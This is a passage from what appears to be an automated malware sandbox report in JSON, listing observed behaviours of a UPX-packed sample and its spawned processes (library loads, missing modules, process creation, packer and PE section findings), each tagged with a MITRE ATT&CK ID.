00000000-00006080)\n \"ndfntv.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00006080)\n \"ndfntv.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00006080)\n \"ndfntv.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00006080)\n \"lvvdvpj.exe\" called \"LoadLibrary\" with a parameter MSVCRT.dll (UID: 00000000-00004476)\n \"lvvdvpj.exe\" called \"LoadLibrary\" with a parameter SHLWAPI.dll (UID: 00000000-00004476)\n \"lvvdvpj.exe\" called \"LoadLibrary\" with a parameter USER32.dll (UID: 00000000-00004476)\n \"8420244.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003872)\n \"8420244.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003872)\n \"8420244.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003872)\n \"8420244.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003872)\n \"bdppl.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00006032)\n \"bdppl.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00006032)\n \"bdppl.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00006032)\n \"bdppl.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00006032)\n \"bdppl.exe\" called \"LoadLibrary\" with a parameter KERNEL32.DLL (UID: 00000000-00006032)\n \"bdppl.exe\" called \"LoadLibrary\" with a parameter MSVCRT.dll (UID: 00000000-00006032)\n \"bdppl.exe\" called \"LoadLibrary\" with a parameter SHLWAPI.dll (UID: 00000000-00006032)\n \"bdppl.exe\" called \"LoadLibrary\" with a parameter USER32.dll (UID: 00000000-00006032)\n \"dtxrlp.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004516)\n \"dtxrlp.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004516)\n \"dtxrlp.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004516)\n \"dtxrlp.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004516)\n \"pdbtf.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00002700)\n \"pdbtf.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00002700)\n \"pdbtf.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00002700)\n \"pdbtf.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00002700)\n \"pbbvvxt.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004104)\n \"pbbvvxt.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004104)\n \"pbbvvxt.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004104)\n \"pbbvvxt.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004104)\n \"64226.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004508)\n \"64226.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004508)\n \"64226.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004508)\n \"64226.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004508)\n \"64226.exe\" called \"LoadLibrary\" with a parameter KERNEL32.DLL (UID: 00000000-00004508)\n \"64226.exe\" called \"LoadLibrary\" with a parameter MSVCRT.dll (UID: 00000000-00004508)\n \"64226.exe\" called \"LoadLibrary\" with a parameter SHLWAPI.dll (UID: 00000000-00004508)\n \"64226.exe\" called \"LoadLibrary\" with a parameter USER32.dll (UID: 00000000-00004508)\n \"8608268.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003752)\n \"8608268.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003752)\n \"8608268.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003752)\n \"8608268.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003752)\n \"6062268.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004520)\n \"6062268.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004520)\n \"6062268.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004520)\n \"6062268.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004520)\n \"4240462.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003348)\n \"4240462.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003348)\n \"4240462.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003348)\n \"4240462.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003348)\n \"xffxhjl.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003004)\n \"xffxhjl.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003004)\n \"xffxhjl.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003004)\n \"xffxhjl.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003004)\n \"rptdfh.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003580)\n \"rptdfh.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003580)\n \"rptdfh.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003580)\n \"rptdfh.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003580)\n \"blphnxr.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00001284)\n \"blphnxr.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00001284)\n \"blphnxr.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00001284)\n \"blphnxr.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00001284)\n \"frljb.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00002472)\n \"frljb.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00002472)\n \"frljb.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00002472)\n \"frljb.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00002472)\n \"64826.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00000132)\n \"64826.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00000132)\n \"64826.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00000132)\n \"64826.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00000132)\n \"64600.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003760)\n \"64600.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003760)\n \"64600.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003760)\n \"64600.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003760)\n \"642428.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00000328)\n \"642428.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00000328)\n \"642428.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00000328)\n \"642428.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00000328)\n \"444002.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00001744)\n \"444002.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00001744)\n \"444002.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00001744)\n \"444002.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00001744)\n \"620262.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004204)\n \"620262.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004204)\n \"620262.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004204)\n \"620262.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004204)\n \"628644.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00000568)\n \"628644.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00000568)\n \"628644.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00000568)\n \"628644.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00000568)\n \"00288.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00000388)\n \"00288.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00000388)\n \"00288.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00000388)\n \"00288.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00000388)\n \"jdrfr.exe\" called \"LoadLibrary\" with a parameter MSVCRT.dll (UID: 00000000-00003540)\n \"jdrfr.exe\" called \"LoadLibrary\" with a parameter SHLWAPI.dll (UID: 00000000-00003540)\n \"jdrfr.exe\" called \"LoadLibrary\" with a parameter USER32.dll (UID: 00000000-00003540)\n \"jjtrtt.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003308)\n \"jjtrtt.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003308)\n \"jjtrtt.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003308)\n \"jjtrtt.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003308)\n \"nvpvtb.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00000768)\n \"nvpvtb.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00000768)\n \"nvpvtb.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00000768)\n \"nvpvtb.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00000768)\n \"jptlrlr.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00001100)\n \"jptlrlr.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00001100)\n \"jptlrlr.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00001100)\n \"jptlrlr.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00001100)\n \"jbvpj.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00001700)\n \"jbvpj.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00001700)\n \"jbvpj.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00001700)\n \"jbvpj.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00001700)", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-22", "type": 6, "relevance": 1, "name": "Fails to load modules at runtime", "description": "\"0260006.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"0260006.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"xlrdpdb.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"xlrdpdb.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"lnxndll.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"lnxndll.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"8028040.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"8028040.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"ndfntv.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"ndfntv.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"8420244.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"8420244.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"bdppl.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"bdppl.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"dtxrlp.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"dtxrlp.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"pdbtf.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"pdbtf.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"pbbvvxt.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"pbbvvxt.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"64226.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"64226.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"8608268.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"8608268.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"6062268.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"6062268.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"4240462.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"4240462.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"xffxhjl.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"xffxhjl.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"rptdfh.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"rptdfh.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"blphnxr.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"blphnxr.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"frljb.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"frljb.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"64826.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"64826.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"64600.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"64600.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"642428.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"642428.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"444002.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"444002.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"620262.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"620262.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"628644.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"628644.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"00288.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"00288.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"jjtrtt.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"jjtrtt.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"nvpvtb.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"nvpvtb.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"jptlrlr.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"jptlrlr.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"jbvpj.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"jbvpj.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]", "origin": "API Call", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-25", "type": 9, "relevance": 3, "name": "Spawns new processes", "description": "Spawned process \"vftrx.exe\" (UID: 00000000-00006136)\n Spawned process \"06626.exe\" (UID: 00000000-00005952)\n Spawned process \"28482.exe\" (UID: 00000000-00005924)\n Spawned process \"0260006.exe\" (UID: 00000000-00004428)\n Spawned process \"44628.exe\" (UID: 00000000-00005656)\n Spawned process \"xlrdpdb.exe\" (UID: 00000000-00000864)\n Spawned process \"lnxndll.exe\" (UID: 00000000-00004064)\n Spawned process \"8028040.exe\" (UID: 00000000-00004168)\n Spawned process \"ndfntv.exe\" (UID: 00000000-00006080)\n Spawned process \"lvvdvpj.exe\" (UID: 00000000-00004476)\n Spawned process \"460060.exe\" (UID: 00000000-00004256)\n Spawned process \"8420244.exe\" (UID: 00000000-00003872)\n Spawned process \"bdppl.exe\" (UID: 00000000-00006032)\n Spawned process \"dtxrlp.exe\" (UID: 00000000-00004516)\n Spawned process \"pdbtf.exe\" (UID: 00000000-00002700)\n Spawned process \"pbbvvxt.exe\" (UID: 00000000-00004104)\n Spawned process \"jftjpxt.exe\" (UID: 00000000-00003364)\n Spawned process \"64226.exe\" (UID: 00000000-00004508)\n Spawned process \"28800.exe\" (UID: 00000000-00004540)\n Spawned process \"20046.exe\" (UID: 00000000-00003352)\n Spawned process \"8608268.exe\" (UID: 00000000-00003752)\n Spawned process \"6062268.exe\" (UID: 00000000-00004520)\n Spawned process \"6884282.exe\" (UID: 00000000-00001900)\n Spawned process \"4688686.exe\" (UID: 00000000-00000944)\n Spawned process \"4240462.exe\" (UID: 00000000-00003348)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-103", "type": 9, "relevance": 3, "name": "Spawns new processes that are not known child processes", "description": "Spawned process \"vftrx.exe\" (UID: 00000000-00006136)\n Spawned process \"06626.exe\" (UID: 00000000-00005952)\n Spawned process \"28482.exe\" (UID: 00000000-00005924)\n Spawned process \"0260006.exe\" (UID: 00000000-00004428)\n Spawned process \"44628.exe\" (UID: 00000000-00005656)\n Spawned process \"xlrdpdb.exe\" (UID: 00000000-00000864)\n Spawned process \"lnxndll.exe\" (UID: 00000000-00004064)\n Spawned process \"8028040.exe\" (UID: 00000000-00004168)\n Spawned process \"ndfntv.exe\" (UID: 00000000-00006080)\n Spawned process \"lvvdvpj.exe\" (UID: 00000000-00004476)\n Spawned process \"460060.exe\" (UID: 00000000-00004256)\n Spawned process \"8420244.exe\" (UID: 00000000-00003872)\n Spawned process \"bdppl.exe\" (UID: 00000000-00006032)\n Spawned process \"dtxrlp.exe\" (UID: 00000000-00004516)\n Spawned process \"pdbtf.exe\" (UID: 00000000-00002700)\n Spawned process \"pbbvvxt.exe\" (UID: 00000000-00004104)\n Spawned process \"jftjpxt.exe\" (UID: 00000000-00003364)\n Spawned process \"64226.exe\" (UID: 00000000-00004508)\n Spawned process \"28800.exe\" (UID: 00000000-00004540)\n Spawned process \"20046.exe\" (UID: 00000000-00003352)\n Spawned process \"8608268.exe\" (UID: 00000000-00003752)\n Spawned process \"6062268.exe\" (UID: 00000000-00004520)\n Spawned process \"6884282.exe\" (UID: 00000000-00001900)\n Spawned process \"4688686.exe\" (UID: 00000000-00000944)\n Spawned process \"4240462.exe\" (UID: 00000000-00003348)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-157", "name": "Matched Compiler/Packer signature (DIE)", "description": "\"511bca581824f939cba8f72afb50c5d8838269f61c8d4e147cc37b8f55927f0e\" was detected as \"UPX\" and name: \"Packer\"\n \"hnldj.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"txvhpv.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"800884.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"800608.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"082060.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"22802.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"2224020.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"8886462.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"dhpnj.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"bnhphvh.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"64462.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"tddht.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"hfnrrt.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"drtpjh.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"482486.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"0484408.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"2226066.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"60440.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"2822060.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"46000.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"644802.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"288022.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"446022.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"fdrnfdr.exe\" was detected as \"UPX\" and name: \"Packer\"", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-176", "type": 6, "relevance": 1, "name": "Calls an API typically used to retrieve function addresses", "description": "details too long to display", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-8", "type": 6, "relevance": 1, "name": "Looks up procedures from modules (excluding apphelp.dll, kernel32.dll, user32.dll, gdi32.dll, ole32.dll, comctl32.dll, uxtheme.dll, oleaut32.dll, version.dll, msctfime.ime)", "description": "\"1300140054f4c975@RPCRT4.dll\"\n \"15001600c03e186a@ADVAPI32.dll\"\n \"0e000f00703f186a@ADVAPI32.dll\"\n \"0e000f00cc3f186a@ADVAPI32.dll\"\n \"11001200b447186a@ADVAPI32.dll\"\n \"110012004848186a@ADVAPI32.dll\"\n \"120013008c48186a@ADVAPI32.dll\"\n \"12001300e448186a@ADVAPI32.dll\"\n \"14001500386e186a@ADVAPI32.dll\"\n \"14001500506e186a@ADVAPI32.dll\"\n \"14001500686e186a@ADVAPI32.dll\"\n \"17001800806e186a@ADVAPI32.dll\"\n \"0d000e00986e186a@ADVAPI32.dll\"\n \"11001200a86e186a@ADVAPI32.dll\"\n \"11001200bc6e186a@ADVAPI32.dll\"\n \"0f001000fc6f186a@ADVAPI32.dll\"\n \"140015003c70186a@ADVAPI32.dll\"\n \"140015005470186a@ADVAPI32.dll\"\n \"0c000d009c70186a@ADVAPI32.dll\"\n \"0c000d00ac70186a@ADVAPI32.dll\"\n \"0e000f00bc70186a@ADVAPI32.dll\"\n \"0e000f00cc70186a@ADVAPI32.dll\"\n \"0b000c00dc70186a@ADVAPI32.dll\"\n \"180019001473186a@RPCRT4.dll\"\n \"130014004073186a@RPCRT4.dll\"", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-128", "type": 6, "relevance": 5, "name": "Calls an API typically used to create a process", "description": "\"lvvdvpj.exe\" called \"CreateProcessA\" with parameter \"c:\\460060.exe\" - (UID: 00000000-00004476)\n \"bdppl.exe\" called \"CreateProcessA\" with parameter \"c:\\dtxrlp.exe\" - (UID: 00000000-00006032)\n \"64226.exe\" called \"CreateProcessA\" with parameter \"c:\\28800.exe\" - (UID: 00000000-00004508)\n \"jdrfr.exe\" called \"CreateProcessA\" with parameter \"c:\\jjtrtt.exe\" - (UID: 00000000-00003540)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-95", "name": "PE file contains writable sections", "description": "\"511bca581824f939cba8f72afb50c5d8838269f61c8d4e147cc37b8f55927f0e\" has an writable section named \"UPX0\"\n \"511bca581824f939cba8f72afb50c5d8838269f61c8d4e147cc37b8f55927f0e\" has an writable section named \"UPX1\"\n \"511bca581824f939cba8f72afb50c5d8838269f61c8d4e147cc37b8f55927f0e\" has an writable section named \"UPX2\"\n \"hnldj.exe\" has an writable section named \"UPX0\"\n \"hnldj.exe\" has an writable section named \"UPX1\"\n \"hnldj.exe\" has an writable section named \"UPX2\"\n \"txvhpv.exe\" has an writable section named \"UPX0\"\n \"txvhpv.exe\" has an writable section named \"UPX1\"\n \"txvhpv.exe\" has an writable section named \"UPX2\"\n \"800884.exe\" has an writable section named \"UPX0\"\n \"800884.exe\" has an writable section named \"UPX1\"\n \"800884.exe\" has an writable section named \"UPX2\"\n \"800608.exe\" has an writable section named \"UPX0\"\n \"800608.exe\" has an writable section named \"UPX1\"\n \"800608.exe\" has an writable section named \"UPX2\"\n \"082060.exe\" has an writable section named \"UPX0\"\n \"082060.exe\" has an writable section named \"UPX1\"\n \"082060.exe\" has an writable section named \"UPX2\"\n \"22802.exe\" has an writable section named \"UPX0\"\n \"22802.exe\" has an writable section named \"UPX1\"\n \"22802.exe\" has an writable section named \"UPX2\"\n \"2224020.exe\" has an writable section named \"UPX0\"\n \"2224020.exe\" has an writable section named \"UPX1\"\n \"2224020.exe\" has an writable section named \"UPX2\"\n \"8886462.exe\" has an writable section named \"UPX0\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-80", "relevance": 1, "name": "PE file contains executable sections", "description": "\"511bca581824f939cba8f72afb50c5d8838269f61c8d4e147cc37b8f55927f0e\" has an executable section named \"UPX0\"\n \"511bca581824f939cba8f72afb50c5d8838269f61c8d4e147cc37b8f55927f0e\" has an executable section named 